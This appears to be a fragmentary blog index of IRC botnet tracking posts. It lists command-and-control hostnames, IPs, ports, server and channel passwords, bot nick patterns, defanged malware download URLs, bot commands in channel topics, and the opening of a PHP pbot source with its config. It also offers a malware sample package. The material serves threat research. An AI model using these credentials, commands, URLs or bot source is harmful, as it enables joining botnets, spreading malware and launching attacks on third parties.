Resolved : [ns3.captain-packet.net] To [154.35.64.24] Remote Host Port Number ns3.captain-packet.net 3900 PASS zomg NICK banzlUSER ypawhj 0 0 :banzlUSERHOST banzlMODE banzl -x+iBJOIN ###bye### byeeeeeNICK pfyfxdUSER bagjsml 0 0 :pfyfxdUSERHOST pfyfxdMODE pfyfxd -x+iBNICK jyptraxUSER xncqm 0 0 :jyptraxUSERHOST jyptraxMODE jyptrax -x+iBNICK peajiUSER etngec 0 0 :peajiUSERHOSTRead more...
irc.whhcd.info(irc botnet hosted in France Roubaix Ovh Sas)
Resolved : [irc.whhcd.info] To [46.105.36.229]Resolved : [irc.whhcd.info] To [176.31.33.45]Resolved : [irc.whhcd.info] To [5.39.44.120] Local users: Current Local Users: 63 Max: 286Global users: Current Global Users: 254 Max: 2003 Server Port irc.whhcd.info 6667 NICK h{UNK|x64}4927137BUSER UserName COMPUTERNAME .Read more...
aminakoyim.co.cc(irc botnet hosted in Austria Graz Edis Gmbh)
Resolved : [aminakoyim.co.cc] To [158.255.211.248] server : aminakoyim.co.cc port:6667 PASS timu NICK n{Ganja-USA|XP}249666USER 2496 “” “TsGh” :2496JOIN #sanaLdarbE timuNICK {Ganja-USA|XP}280260USER 2802 “” “TsGh” :2802NICK {Ganja-USA|XP}394185USER 3941 “” “TsGh” :3941NICK {Ganja-USA|XP}737459USER 7374 “” “TsGh” :7374 Now talking in #sanaLdarbE Topic On: [ #sanaLdarbE ] [ ]Topic By: [ infeCTeD ] hosting infos: http://whois.domaintools.com/158.255.211.248
digested.maneradio.net(irc botnet hosted in Germany Karlsruhe 1&1 Internet Ag )
Resolved : [digested.maneradio.net] To [82.165.156.127] Download URLs hxxp://107.20.142.191/u/108730327/c.exe (dl.dropbox.com) hxxp://74.208.112.117:6/.x/heroi.exe C&C Server: 82.165.156.127:1866 Server Password: Username: hh Nickname: n[DEU|XP|DELL-D3E62F7E26]vddowpy Channel: #!h! (Password: ) Channeltopic: :.load /99/106/112/81/55/59/40/110/116/35/105/120/111/108/117/108/110/38/127/122/100/56/126/9/18/40/39/45/57/39/42/56/55/44/98/14/100/123/108/ Topic By: [ tx ] UPDATE: concerning a post from Anonymous guy i m adding this here with modifications to prevent accidental infections Here is a smoke bin iRead more...
botnet.gen.tr(irc botnet hosted in Turkey Balikesir Turk Telekomunikasyon Anonim Sirketi)
Resolved : [botnet.gen.tr] To [88.255.116.47] Remote Host Port botnet.gen.tr 6667 Passwd secret Channels Now talking in #XXX Topic On: [ #XXX 12] [ 13 .html .lan .dwl hxxp://www.universe-bty.co.th/promina_images/MuTomyumZ_Full_V2.exe .visit hxxp://www.alizametal.com.tr/KCA.html ] Topic By: [ KCA ] [5:36](KCA) .visit hxxp://www.alizametal.com.tr/KCA.html ([iRooT-W7-USA]564523) hxxp://www.alizametal.com.tr/KCA.html Has Been Visited! ([iRooT-W7-USA]553377) hxxp://www.alizametal.com.tr/KCA.html Has Been Visited! Now talking in #x Topic On:Read more...
244mb samples
This is another package with diferent malware samples collected from me have fun with samples and dont forget only for research purposes Download
178.79.171.44(Linux pbots hosted in United Kingdom Leeds Linode Llc)
var $config = array("server"=>"178.79.171.44", "port"=>"5863", "pass"=>"", "prefix"=>"XxX|", "maxrand"=>"5", "chan"=>"#resident.evil", "chan2"=>"#resident.evil", "key"=>"", "modes"=>"+p", "password"=>"ddos", "trigger"=>".", "hostauth"=>"*" pbot source: <? /* * * NOGROD. since 2008 * IRC.UDPLINK.NET * * COMMANDS: * * .user <password> //login to the bot * .logout //logout of the bot * .die //kill the bot * .restart //restart the bot * .mailRead more...
h.maqder.info(irc botnet hosted in United States Wisconsin Rapids Datawave Technologies Llc)
Resolved : [h.maqder.info] To [206.176.205.101] Remote Host Port Number h.maqder.info 3921 NICK GL-154325340 USER ianbryzrwyw 0 0 :GL-154325340 USERHOST GL-154325340 MODE GL-154325340 +x+i JOIN #n msspas’ NICK GL-142987297 USER epqnfvzbqyg 0 0 :GL-142987297 USERHOST GL-142987297 MODE GL-142987297 +x+i NICK GL-802428583 USER puyriaytwb 0 0 :GL-802428583 USERHOST GL-802428583 MODE GL-802428583 +x+i NICK GL-470192572 USER odzajtdpxck 0Read more...
gtfo.myprivatefile.com(irc botnet hosted in United States Clifton Park Search Guide Inc)
Resolved : [gtfo.myprivatefile.com] To [184.106.87.139] Resolved : [gtfo.myprivatefile.com] To [66.152.109.69 13] Resolved : [gtfo.myprivatefile.com] To [69.16.143.69 13] Remote Host Port Number gtfo.myprivatefile.com 1337 PASS google_cache1tfsg4.tmp NICK X[USA][XP-SP2]150351 USER 9092 “” “lol” :9092 JOIN #swarm swarm NICK {NEW}X[USA][XP-SP2]020911 USER 0441 “” “lol” :0441 NICK X[USA][XP-SP2]075732 USER 5218 “” “lol” :5218 hosting infos: http://whois.domaintools.com/66.152.109.69
blah.swapixtreme.com(irc botnet hosted in United Kingdom Vooservers Ltd)
Resolved : [blah.swapixtreme.com] To [91.227.221.217] Clients: I have 308 clients and 1 servers Local users: Current Local Users: 308 Max: 1 Global users: Current Global Users: 309 Max: 1105 Remote Host Port Number blah.swapixtreme.com 7878 NICK [GSA]-274266 USER hhzegr 0 0 :[GSA]-274266 USERHOST [GSA]-274266 MODE [GSA]-274266 +xt JOIN #b imallowed2020 hosting infos: http://whois.domaintools.com/91.227.221.217